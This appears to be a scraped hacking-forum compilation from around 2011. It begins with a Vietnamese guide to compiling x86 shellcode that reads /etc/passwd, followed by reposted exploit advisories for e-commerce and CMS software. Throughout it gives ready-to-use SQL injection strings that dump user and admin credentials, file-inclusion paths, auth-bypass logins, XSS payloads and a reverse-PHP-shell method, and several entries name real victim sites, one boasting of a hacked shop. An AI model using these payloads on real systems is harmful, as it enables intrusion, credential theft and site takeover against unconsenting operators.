hack Local (it can bypass chmod 400)

http://shell-storm.org/shellcode/files/shellcode-73.php



Chúng ta dùng shell code


/*
Linux/x86 file reader.

65 bytes + pathname
Author: certaindeath

Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two

one:
pop %ebx

movb $5, %al
xor %ecx, %ecx
int $0x80

mov %eax, %esi
jmp read

exit:
movb $1, %al
xor %ebx, %ebx
int $0x80

read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80

xor %ebx, %ebx
cmp %eax, %ebx
je exit

movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80

add $1, %esp
jmp read

two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd

Shellcode này giúp chúng ta view đc file bất kì khi sử dụng và thay đổi path /etc/passwd thành path cần view thôi.
Cách thực hiện.
Save dưới dạng file exploit.c
Sau đó compile lại bằng lệnh 
gcc -o exploit exploit.c

Trông như get root vậy
Sau đó sẽ xuất hiện file exploit
Nâng file đấy lên thành 777.Dùng lệnh
Chmod +x exploit

Và cuối cùng là 
./exploit

Kết quả là ta đọc đc file /etc/passwd
Rất giống getroot phải ko 
Cách thực hiện rất dễ.
GCC.ZIP

Nhiều server cấm lệnh gcc thì bạn có thể dùng file gcc ở 1 server linux nào đó.Máy ảo chẳng hạn.Up lên rồi chmod 777 rồi ./gcc để thực hiện lệnh....

Ngoài ra các bạn có thể làm tắt server bằng file exploit sau đây.

http://shell-storm.org/shellcode/files/shellcode-68.php

jbShop - e107 v7 CMS Plugin - SQL Injection

# Exploit Title: jbShop - e107 v7 CMS plugin - SQL Injection vulnerability

# Author: Robert Cooper (admin[at]websiteauditing.org)

# Software Link: http://sourceforge.net/projects/jbshop/

# Tested on: [Linux/Windows 7]

#Vulnerable Parameter:

item_id=

##############################################################

PoC:

http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--

##############################################################

www.websiteauditing.org

www.areyousecure.net

# Shouts to the Belegit crew

WHMCompleteSolution (cart.php) Local File Disclosure

# Title      : WHMCompleteSolution (cart.php) Local File Disclosure

# Author     : Lagripe-Dz

# Product    : WHMCS ( WHMCompleteSolution )

# Vendor     : http://whmcs.com/

# Date       : 10/01/2011

# Version    : 3.x.x , 4.0.x

# Tested on  : linux+apache

================================================================

Vuln file: cart.php

---------

Vuln code:

---------

if ( $a == "add" )

{

$templatefile = "configureproductdomain";

....etc

}

if ( $a == "login" )

{

$templatefile = "login";

....etc

}

...

outputClientArea( $templatefile, $nowrapper );

# outputClientArea function will display

"./templates/orderforms/cart/{$templatefile}.tpl"

Details :

---------

if variable "$a" has a true value .. will set "$templatefile" value by

default

but when "$a" value didn't match the defaults values

you can control "$templatefile" and use it as ( File Disclosure )

Proof of Concept :

------------------

http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]

http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php

note* : show the page source to see Disclosure file.

Solution :

----------

the vendor Notificate

update to the last version

================================================================

Greetz To All www.Sec4ever.com Members.

Easy Hosting Control Panel Admin Auth Bypass

# Exploit Title: Easy Hosting Control Panel Admin Auth Bypass

# Google Dork: inurl:/ehcp/?op=applyfordomainaccount

# Date: 10/04/2011

# Author: Jasman

# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net

# Version: 0.29.10 - 0.29.13

# Tested on: Ubuntu, Debian

+ Description

Easy Hosting Control Panel designed for hosting of multiple domains on single machine.

It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional

+ Vulnerable:

to add a ftp account & domain does not require a login.

http://site.com/vhosts/ehcp/?op=applyforaccount

http://site.com/vhosts/ehcp/?op=applyforftpaccount

http://site.com/vhosts/ehcp/?op=applyfordomainaccount

+ Exploit

upload a shell via ftp

http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php

+ Tested On

0.29.13

0.29.11

0.29.10

redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability

[#] Exploit Title   : redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability

[#] Google Dork     : "powered by redmind�" or "Entwickelt und betrieben von redmind�"

[#] Software Link   : http://www.redmind.de/online-shop.html

[#] Version     : N/A

[#] Tested on       : Linux IDBlackcoder

[#] Date        : September 28th, 2011

[#] Author      : Mbah_Semar

[#] Homepage        : http://www.blackcoder.or.id | http://www.blackhat.or.id

#####################################################################[ Vulnerable File ]    http://www.example.com/product.php?prodID=[SQLi]

[ Example ] http://www.example.com/product.php?prodID=9999 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

#####################################################################

[Thank's to][*] All member and Staff Indonesian Blackcoder[*] My Master : sudden_death (terimakasih atas ilmunya)[*] Special to ex member suramcrew: Kodok ijo, Gisa Maho, Lukas Bling, Pasukan dari Sempax, Zero-Line, Aanz, anharku, hakz

[Note][*] Aku sayang Ibu :)

Cart Software Multiple Vulnerabilities

=========================================================
sabadkharid CMS Multiple Vulnerabilities
=========================================================

   010101010101010101010101010101010101010101010101010101010  
   0                                                       0
   1     Iranian NOPO Digital Security Team 2011           1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
  
 
# Exploit Title: sabadkharid CMS Multiple Vulnerabilities
# Date: 8/07/2011                           
# Author: hosinn                    
# Software Link: http://www.sabadkharid.com
# Version: professional edition
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
# Download Video: http://hosinn.persiangig.com/video/sabadkharid.rar
  
#  BUG Sql Injectin :  ###############################################################

1 > cart.php have sql injection bug .

2 > go to http://target.com/cart.php?shopping_cart&add2cart=10'
 
 
#  Expolite :  #######################################################################
 
1 > get version    => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select @@version from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

2 > get username   => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
            or     => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from skh_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

  > output like 'admin1' and username:admin
 
3 > get password   => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select cust_password from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
            or     => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select cust_password from skh_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

  > output like 'cGFzcw==1' and It Base64 Encoded
  
  > Then pass : Decoding 'cGFzcw=='
  
4 > Then Login To Site
 
#  BUG LFI :  ######################################################################

1 > Go To Http://site.com/admin.php

2 > Go To Http://site.com/admin.php?tab=conf&sub=template&edit=../../../cart.php

3 > Then Copy Your Shell script & Save

4 > Find Your Shell in Http://site.com/cart.php


# Example  ##################################################################

http://tehranshopping.ir/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

http://elia-co.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from skh_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/


#############################################################################
 
Our Website : http://www.nopotm.ir
  
Special Thanks to :  N3td3v!l , H-SK33PY , Immortal Boy , BigB4NG
 
Blacksun , Drosera^Cqq47 , NOPO , zilli0o0n &  all iranian NOPO members
  
#############################################################################

vbSEO – From XSS to Reverse PHP Shell

31st January 2011 - by MaXe

XSS is not a big deal, or is it? On many occasions, I’ve seen this vulnerability being classified as useless, not serious, and being a low threat. What I’ve always had in mind is that it’s only the capabilities of the browser, and the hackers mind which sets the limit for a XSS attack.

It may seem impossible to do anything else other than stealing sessions, cookies and performing phishing, client side defacements etc. But take a look at the picture above, that is a reverse php shell automatically injected into the site, when a vBulletin administrator viewed a malicious linkback.

The vulnerability itself I’m referring to, is a 0day within vBSEO which exists within the administrator and moderator panel only. However, the attacker is able to inject persistent scripts via this linkback feature directly into the part of these panels handling these linkbacks.

In short, the attacker crafts a malicious HTML page as shown in the advisory. Then, the attacker clicks a link to the target forum with vBSEO installed, and when the target is reached, vBSEO performs a GET-request to the attacker’s malicious HTML page (if it’s served online and if RefBacks are enabled).

The title of this page is then loaded directly into the database, and an administrator can see it sanitized in the actual thread, but also in the admin and mod panel where the title is not sanitized at all, allowing the script to run.

What is actually possible?

After discovering and researching this vulnerability, I realised it was a fine case to do further studies on and then develop a XSS worm. Fortunately I got away from that idea due to the fact it could’ve been abused globally on forums with vBSEO installed. However, the idea itself was not bad so I began developing the payload aka the javascript, which would eventually inject a PHP payload via the nice plugin feature in vBulletin.

Initially, the XSS trojan I wrote should be able to do all of this silently without the user knowing, so instead of document.write being used, appendChild which uses DOM objects, was used instead. This took a bit more work in order to function better, but the result was that the visible window would not change to the affected user getting infected with this trojan.

When the user browses to, in this case “Moderate Linkbacks”, the script is executing as soon as the user hits that page. When this happens, the trojan checks whether infection has already happened once and if not, continues. Then an iframe is created outside the visible frames, where the adminhash and securitytoken (CSRF-token) is read and saved in a local variable in the browser.

Then a new form is injected into this iframe, which contains the adminhash and the securitytoken. The form itself contains the values needed to create a new and completely valid plugin which in this case, is PHP code. At this point, the script checks again if the user has already been infected and if not, the form is submitted, the plugin is created, and a cookie is set to prevent the script from going in loops.

Most administrators, would notice the broken lock icon in case they use HTTPS / SSL, and then they would view the source. The great thing about using javascript to create HTML objects, especially with “appendChild” etc. is that it is not visible. A debugger, such as Firebug shown in the picture above is needed, unless the admin finds the malicious javascript payload and reads what it does, but then it might be too late.

During the execution of the XSS trojan, a time-out is set. When time runs out, the XSS trojan will try to delete itself leaving almost no traces, besides the possible injected plugin, and the remains of the hidden iframe outside the frames which cannot be viewed due to the way HTML works in FireFox.

If the attacker was successful, and patient as well, he would eventually see that the target website had already connected back to retrieve the title, but also that another user had triggered the XSS Trojan which hopefully injected the PHP plugin specified by the attacker.

So what’s this tool I’ve been using during my presentation of this vulnerability? It’s a recently developed tool written in Python, where the payload is written in Javascript, freely available to anyone in the bottom of this blog. I recommend however, that a user of this tool looks inside the source code.

Is XSS a serious threat then?

Yes, it definitely is.
For a demonstration of the tool and this vulnerability, check either the YouTube or RapidShare link below.
References:
Advisory: vBSEO 3.5.2 & 3.2.2 – Persistent XSS via LinkBacks
Advisory #2: vbSEO Multiple Vulnerabilities
EvilWebTool: EvilWebTool
YT Video: http://www.youtube.com/watch?v=B6QAjB3kYec
HQ Video: http://rapidshare.com/files/445021103/vbseo_0day.mp4

By Pass Admin Tradingeye E-commerce Shopping Cart

# Exploit Title: Tradingeye Multiple Vulnerabilities

# Vendor:  www.tradingeye.com

# Date: 12th july,2011

# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (

http://www.shadowrootkit.wordpress.com)

# Google Dork:  Powered by Tradingeye. 2009 Tradingeye v6 demo

*****************************************************************************************************************************************************************************************

BREIF DESCRIPTION

*****************************

Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS,

built from the ground up with web accessibility and SEO in mind. Tradingeye

is the

choice of thousands of online retailers who care about accessibility,

usability and most importantly - results.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability

***************************************

{DEMO} : http://site.com/adminindex.php

EXPLOIT:

Username: ' or 0=0 #

Password: ' or 0=0 #

Observe: Attackers can use Authentication Bypass to get into Admin Panel in

the site.

demo:

http://www.aqueos.co.uk/adminindex.php

http://www.ginkofineart.com/admin/adminindex.php

Reflected XSS Vulnerability

********************************

EXPLOIT 2: Reflected XSS Vulnerability in admin panel(search field)

{Demo}:

http://site.com/user/adminindex.php?action=user.home

Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

Local root exploit 2.6.34 2011

http://www.mediafire.com/?cq5he1tx2dy7ccq
http://www.mediafire.com/?m2h7wf2okb183xv

BbZL.PhP File Inclusion Exploit

# Exploit Title: [BbZL.PhP File Inclusion Exploit]

# Google Dork: [intitle:"BbZL.PhP 0.92 CSS²"]

# Date: [06/07/2011]

# Author: [Number 7]

# Software Link: [http://www.easy-script.com/scripts-dl/bbzl_PhP_092.zip]

# Version: [0.92 CSS²]

# Tested on: [linux/Windows NT]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exp: http://www.site.tn/path/index.php?type=3&lien_2=http://site.com.tn/

www.ewit.in Admin Auth ByPass

Code:

============================================================
# Title: 
eWit Infotech  Admin Auth ByPass

# Date:14/6/11
# Author: hdownloadz(mohsan123)
# Home: www.alboraaq.com
# Category: Web apps
# Dork: intxt:"Powered by eWit Infotech"
# Tested On : Xp and windows 7
===========================================================

[+] Default admin panel : http://localhost/admin

[+] ByPass the admin auth by using 

Username : ' or '1=1
Password : ' or '1=1


     

[-] Demo:~

     http://vsr.in/admin



(^_^)GOOD LUCK ALL(^_^)

www.peppersquare.com/ Admin Auth ByPass

Code:

============================================================
# Title: 
 pepper square  Admin Auth ByPass

# Date:14/6/11
# Author: hdownloadz(mohsan123)
# Home: www.alboraaq.com
# Category: Web apps
# Dork: intxt:"Designed by pepper square"
# Tested On : Xp and windows 7
===========================================================

[+] Default admin panel : http://localhost/admin

[+] ByPass the admin auth by using 

Username : ' or '1=1
Password : ' or '1=1


     

[-] Demo:~

     http://www.maxhealthcare.in/admin



(^_^)GOOD LUCK ALL(^_^)

Alderney Web => SQL injection vulnerability exploit

=====================================================================
# Title: Alderney Web=>SQL injection vulnerability
# Date:13/6/11
# Author: Sideswipe
# Home:www.alboraaq.com 
# Category: Web apps
# Dork: intext:"Website designed and hosted by Alderney Web & IT Services"
# Tested On : Xp and windows 7
=====================================================================

[-] Exploit:~
    
      #http://www.[localhost].com/showphotos.php?id=1'
      #http://www.[localhost].com/showphotos.php?id=(sql)

     #http://www.[localhost].com/readnews.php?id=6'
     #http://www.[localhost].com/readnews.php?id=(sql)

[-] Demo:~

     #http://www.longisbay.com/showphotos.php?id=2'
    #http://www.alderneyjournal.com/readnews.php?id=1104'
   

(^_^)GOOD LUCK ALL(^_^)

acewebsitedesign Admin Auth ByPass

Code:

============================================================
# Title: acewebsitedesign  Admin Auth ByPass

# Date:13/6/11
# Author: hdownloadz(mohsan123)
# Home: www.alboraaq.com
# Category: Web apps
# Dork: intxt:"Site designed & hosted by: Ace Website Design"
# Tested On : Xp and windows 7
===========================================================

[+] Default admin panel : http://localhost/admin

[+] ByPass the admin auth by using 

Username : ' or '1=1
Password : ' or '1=1


     

[-] Demo:~

     http://www.vi-ga.in/admin



(^_^)GOOD LUCK ALL(^_^)

New shop hack paypals etc.. Exploit

New exploit REP ME!

dork : inurl:"lire/index.php?rubid="
exploit : +UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+ from+peel_utilisateurs--
: +UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+ from+utilisateurs--
demo : http://victim.com/lire/index.php?rub...utilisateurs--

EXAMPLE SHOP I HACKED:
http://www.motorloisirs.com/lire/ind...utilisateurs--

crack md5 online:
http://md5crack.com

OpenCart 1.4.9 Multiple Local File Inclusion Vulnerabilities

###

# Title : OpenCart 1.4.9 LFI Multiple Vulnerability

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com<script type="text/javascript">

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</script>

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Twitter page : twitter.com/kedans

# platform : php

# Impact : Multi LFI

# Tested on : Windows XP sp3 FR

###

# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )

##

# [»] Go0gle Dork : "Powered by opencart 1.4.9"

###

# Exploit :

http://[localhost]/[Path]/index.php?route=common/seo_url&product_id=[LFI]

http://[localhost]/[Path]/index.php?route=common/seo_url&category_id=1&path=[LFI]

http://[localhost]/[Path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd

=================================================================================================

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================

# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >

# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz

# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz

# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)

# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{

# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX

# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,

# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com

# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...

#================================================================================================

EZ-Shop 1.02 Lateral SQL Injection Vulnerability

[Security Advisory Details: 14/04/2011]

[Script]           EZ-Shop 1.02

[Location]       http://www.fcsoftware.co.uk/index.php?page=opensource

[Vulnerability]  SQL Injection

[Original Adv]   http://y-osirys.com/security/exploits/id28

[Author]         Giovanni Buzzin, "Osirys"

[Site]           y-osirys.com

[Contact]        osirys[at]autistici[dot]org

Greets to: stratsec,senseofsecurity

------------------------------------------------------------------------------------------------------------

[CMS Description]

EZ-Shop is a simple out of the box e-Commerce solution aimed at small startups and independant retailers

looking to get into online trade. The system was initially designed to be simple and easy to use but with

many features that more complex packages lack.

------------------------------------------------------------------------------------------------------------

[Security Flaw]

EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanization.

[code:/specialoffer.php:line 249-283]

<?php

if(isset($_REQUEST['specialid']) && ($_REQUEST['specialid'])!="")

{

?><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">

<tr>

<td height="23" colspan="2" class="head"><table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>

<td style="width:1px;"></td>

<td height="22" bgcolor="#000000" class="style1" style="padding-left:14px;">Products</td>

<td style="width:1px;"></td>

</tr>

</table></td>

</tr>

<?php

$speid=$_REQUEST['specialid'];

$sql="select * from tblprodgiftideas where intgiftideaid='$speid'";

$resgid=$obj_db->select($sql);

if(count($resgid)>0)

{

for($p=0;$p<count($resgid);$p++)

{

//echo $resgid[$p]['intprodid']."<br>";

$prid=$resgid[$p]['intprodid'];

$sql6="select * from tblproddesc where intid='$prid'";

$resprname1=$obj_db->select($sql6);

if(count($resprname1)>0)

{

$desc=$resprname1[0]['txtdesc'];

$resprname1=$resprname1[0]['varprodname'];

}

else

{

$resprname1="";

}

$sql6="select * from tblproducts where intprodid='$prid'";

$resprname=$obj_db->select($sql6);

if(count($resprname)>0)

{

$proprice=$resprname[0]['decprice'];

?>

<tr>

<td width="50%"><table width="100%" height="170" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC" class="proborder">

<tr>

<td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>

[/code]

This vulnerability is kind of weird, since is an SQL Injection injected through a column result of another SQL Injection.

The variable $speid comes from $_REQUEST, without being properly sanitized, here the Injection starts.

QUERY 1: $sql="select * from tblprodgiftideas injectwhere intgiftideaid='$speid'";

The result of this Query is not showed on the screen, but is sent to another query: QUERY 2.

QUERY 2: $sql6="select * from tblproddesc where intid='$prid'";

As we can see from this piece of code:

[code]

$speid=$_REQUEST['specialid'];

$sql="select * from tblprodgiftideas where intgiftideaid='$speid'";

$resgid=$obj_db->select($sql);

if(count($resgid)>0)

{

for($p=0;$p<count($resgid);$p++)

{

//echo $resgid[$p]['intprodid']."<br>";

$prid=$resgid[$p]['intprodid']; <---- prid

$sql6="select * from tblproddesc where intid='$prid'";

[/code]

This time the result of QUERY 2 is showed through : <?php echo $resprname1;?>

So basically, what we need to do is to inject a query into QUERY 1 that will give back as a result another SQL Injection, injected

then into QUERY 2 through $prid.

To do this, concat() mysql functions can become very helpful. Let's inject the second Injection as separator encrypted in hex.

Ex: concat(hex(SQL_PART1),something,hex(SQL_PART2));

something could be: @@version

Since we don't want it to interfer with the Injection, we can comment it, updating the concat() in this way:

SQL_PART1 : 1' union select 1,2,/* --> hex(SQL_PART1) = 0x312720756e696f6e2073656c65637420312c322c2f2a

something : @@version

SQL_PART" : */@@version,4,5#       --> hex(SQL_PART2) = 0x2a2f404076657273696f6e2c342c3523

Concat will be: concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)

mysql> select concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523);

+-----------------------------------------------------------------------------------------------------+

| concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523) |

+-----------------------------------------------------------------------------------------------------+

| 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#                                             |

+-----------------------------------------------------------------------------------------------------+

1 row in set (0.00 sec)

mysql>

Here is the Second Injection: 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#

## Background Operation

Injection 1 on QUERY 1: 1' union select 1,2,concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@vers

ion,0x2a2f404076657273696f6e2c342c3523)%23

QUERY 1:                select * from tblprodgiftideas where intgiftideaid='1' union select 1,2,concat(0

x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e

2c342c3523)#'

Backend Injection 2 on QUERY 2: 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#'

QUERY 2:                      select * from tblproddesc where intid='1' union select 1

,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#'

(5.1.49-1ubuntu8.1 is commented in order to not interfer with our query) ->

-> union select 1,2,@@version,4,5

That will finally show through $resprname1 our @@version: 5.1.49-1ubuntu8.1

SQL Inection p0c:

/[cms path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c6563742031

2c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)%23

Since administrations details are stored in tbladmin table:

[tbladmin]:[intid,varadminfname,varadminname,varpassword,intstatus,varemail,ttLastLogginDate]

Injection:

SQL_PART1: 1' union select 1,2,/*

hex(SQL_PART1) = 0x312720756e696f6e2073656c65637420312c322c2f2a

something: @@version

SQL_PART1: */concat(0x3a,varadminname,0x3a,varpassword,0x3a,varemail,0x3a),4,5 from tbladmin#

hex(SQL_PART2) = 0x2a2f636f6e63617428307833612c76617261646d696e6e616d652

c307833612c76617270617373776f72642c307833612c766172656d

61696c2c30783361292c342c352066726f6d2074626c61646d696e23

concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f636f6e63617428

307833612c76617261646d696e6e616d652c307833612c76617270617373776f72642c307833612c7661

72656d61696c2c30783361292c342c352066726f6d2074626c61646d696e23)

Final Injection:

/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637

420312c322c2f2a,@@version,0x2a2f636f6e63617428307833612c76617261646d696e6e616d652c3078

33612c76617270617373776f72642c307833612c766172656d61696c2c30783361292c342c352066726f6d

2074626c61646d696e23)%23

That will show:

:admin:21232f297a57a5a743894a0e4a801fc3:support@fcsoftware.co.uk<script type="text/javascript">

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</script>:

-> Owned

------------------------------------------------------------------------------------------------------------

[Exploit]

MySQL Version p0c:

[p0c]

/[cms path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637

420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)%23

[/p0c]

Admin's details p0c:

[p0c]

/[cms_path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637

420312c322c2f2a,@@version,0x2a2f636f6e63617428307833612c76617261646d696e6e616d652c307833612c76617

270617373776f72642c307833612c766172656d61696c2c30783361292c342c352066726f6d2074626c61646d696e23)%23

[/p0c]

------------------------------------------------------------------------------------------------------------

[Credits]

Credit goes to Giovanni Buzzin, "Osirys" for the discover of this vulnerability.

(Meglio)

------------------------------------------------------------------------------------------------------------

[END: 14/04/2011]